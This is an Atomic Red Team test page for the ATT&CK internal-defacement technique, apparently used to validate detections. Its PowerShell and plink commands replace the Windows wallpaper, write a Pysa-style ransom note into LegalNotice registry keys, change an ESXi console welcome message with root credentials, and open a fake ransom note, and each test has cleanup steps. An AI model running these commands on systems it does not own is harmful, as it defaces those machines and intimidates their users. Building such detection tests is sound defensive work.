security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c7310aa4276f8d1ac64bd3f23eefbfdd6e2e42ff
atomic-red-team/atomics/T1491.001/T1491.001.md
T
Atomic Red Team doc generator 376bf2a64d Generated docs from job=generate-docs branch=master [ci skip]
2026-02-18 16:46:29 +00:00

11 KiB
Raw Blame History

T1491.001 - Defacement: Internal Defacement

Description from ATT&CK

An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites or server login messages, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster)(Citation: Varonis) Disturbing or offensive images may be used as a part of Internal Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)

Source

Atomic Tests

Atomic Test #1: Replace Desktop Wallpaper

Downloads an image from a URL and sets it as the desktop wallpaper.

Supported Platforms: Windows

auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3

Inputs

Name Description Type Default Value
url_of_wallpaper URL pointing to the image file you wish to set as wallpaper url https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png
pointer_to_orginal_wallpaper Full path to where a file containing the original wallpaper location will be saved string $env:TEMP\T1491.001-OrginalWallpaperLocation
wallpaper_location Full path to where the downloaded wallpaper image will be saved string $env:TEMP\T1491.001-newWallpaper.png

Attack Commands: Run with powershell!

$url = "#{url_of_wallpaper}"
$imgLocation = "#{wallpaper_location}"
$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\Control Panel\Desktop\' -Name WallPaper).WallPaper
$orgWallpaper | Out-File -FilePath "#{pointer_to_orginal_wallpaper}"
$updateWallpapercode = @' 
using System.Runtime.InteropServices; 
namespace Win32{

    public class Wallpaper{ 
        [DllImport("user32.dll", CharSet=CharSet.Auto)] 
         static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; 
         
         public static void SetWallpaper(string thePath){ 
            SystemParametersInfo(20,0,thePath,3); 
        }
    }
} 
'@
$wc = New-Object System.Net.WebClient  
try{  
    $wc.DownloadFile($url, $imgLocation)
    add-type $updateWallpapercode 
    [Win32.Wallpaper]::SetWallpaper($imgLocation)
} 
catch [System.Net.WebException]{  
    Write-Host("Cannot download $url") 
    add-type $updateWallpapercode 
    [Win32.Wallpaper]::SetWallpaper($imgLocation)
} 
finally{    
    $wc.Dispose()  
}

Cleanup Commands

$updateWallpapercode = @' 
using System.Runtime.InteropServices; 
namespace Win32{

    public class Wallpaper{ 
        [DllImport("user32.dll", CharSet=CharSet.Auto)] 
         static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; 
         
         public static void SetWallpaper(string thePath){ 
            SystemParametersInfo(20,0,thePath,3); 
        }
    }
} 
'@
if (Test-Path -Path #{pointer_to_orginal_wallpaper} -PathType Leaf) {
     $orgImg = Get-Content -Path "#{pointer_to_orginal_wallpaper}"
     add-type $updateWallpapercode 
     [Win32.Wallpaper]::SetWallpaper($orgImg)
}
Remove-Item "#{pointer_to_orginal_wallpaper}" -ErrorAction Ignore
Remove-Item "#{wallpaper_location}" -ErrorAction Ignore

Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message

Display ransom message to users at system start-up by configuring registry keys HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption and HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeText.

SynAck Ransomware, Grief Ransomware, Maze Ransomware, Pysa Ransomware, Spook Ransomware, DopplePaymer Ransomware, Reedemer Ransomware, Kangaroo Ransomware

Supported Platforms: Windows

auto_generated_guid: ffcbfaab-c9ff-470b-928c-f086b326089b

Inputs

Name Description Type Default Value
legal_notice_caption Title of ransom message string PYSA
legal_notice_text Body of ransom message string Hi Company, every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data contact us:xxxx@onionmail.org

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

$orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption
$orgLegalNoticeText = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText).LegalNoticeText
$newLegalNoticeCaption = "#{legal_notice_caption}"
$newLegalNoticeText = "#{legal_notice_text}"
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $newLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $newLegalNoticeText -Type String -Force

Cleanup Commands

Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $orgLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $orgLegalNoticeText -Type String -Force

Atomic Test #3: ESXi - Change Welcome Message on Direct Console User Interface (DCUI)

Changes the ESXi welcome message to potentially display ransom information. Reference

Supported Platforms: Windows

auto_generated_guid: 30905f21-34f3-4504-8b4c-f7a5e314b810

Inputs

Name Description Type Default Value
vm_host Specify the host name or IP of the ESXi server. string atomic.local
vm_user Specify the privilege user account on the ESXi server. string root
vm_pass Specify the privileged user's password. string password
plink_file Path to Plink path PathToAtomicsFolder\..\ExternalPayloads\plink.exe

Attack Commands: Run with command_prompt!

echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "esxcli system welcomemsg set -m 'RANSOMWARE-NOTIFICATION'"

Dependencies: Run with powershell!

Description: Check if we have plink
Check Prereq Commands
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
Get Prereq Commands
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"

Atomic Test #4: Windows - Display a simulated ransom note via Notepad (non-destructive)

Creates a temporary ransom-note text file and opens it in Notepad to simulate ransomware "note display" behavior without making destructive changes. SAFE and non-destructive.

Supported Platforms: Windows

auto_generated_guid: 0eeb68ce-e64c-4420-8d53-ad5bdc6f86d5

Inputs

Name Description Type Default Value
note_filename File name for the simulated ransom note string ART-T1491-ransom-note.txt
pid_filename File name for storing Notepad PID string ART-T1491-notepad.pid
note_title Title at the top of the ransom note string !!! READ_ME_NOW !!!
note_body The body of the ransom note (plain text) string Your files are SAFE. This is a TEST note for detection validation
by bak3n3k0. No data has been encrypted. This simulation exercises
detections for:
  • notepad.exe launched with a ransom-themed text file
  • creation of a ransom-themed text file in %TEMP% NON-DESTRUCTIVE Atomic Red Team test.|

Attack Commands: Run with powershell!

$notePath = Join-Path $env:TEMP "#{note_filename}"
$pidPath  = Join-Path $env:TEMP "#{pid_filename}"

$Title = "#{note_title}"
$Body  = "#{note_body}"

$header  = $Title + "`r`n" + ('=' * $Title.Length) + "`r`n`r`n"
$content = $header + $Body

[System.IO.File]::WriteAllText($notePath, $content, [System.Text.Encoding]::UTF8)

$p = Start-Process notepad.exe -ArgumentList "`"$notePath`"" -PassThru
$p.Id | Out-File -FilePath $pidPath -Encoding ascii -Force

Cleanup Commands

try {
  # 1. Kill all Notepad processes
  Get-Process notepad -ErrorAction SilentlyContinue |
    ForEach-Object {
      Stop-Process -Id $_.Id -Force -ErrorAction SilentlyContinue
    }

  # 2. Wait briefly for Windows to release file handles
  Start-Sleep -Seconds 1

  # 3. Force delete ransom note + PID file
  $notePath = Join-Path $env:TEMP "ART-T1491-ransom-note.txt"
  $pidPath  = Join-Path $env:TEMP "ART-T1491-notepad.pid"

  if (Test-Path $notePath) {
    Remove-Item $notePath -Force -ErrorAction Stop
  }
  if (Test-Path $pidPath) {
    Remove-Item $pidPath -Force -ErrorAction Stop
  }
}
catch {
  Write-Warning "Cleanup failed with error: $_"
}

Dependencies: Run with command_prompt!

Description: Notepad must be present on the system
Check Prereq Commands
where notepad
Get Prereq Commands
Reference in New Issue View Git Blame Copy Permalink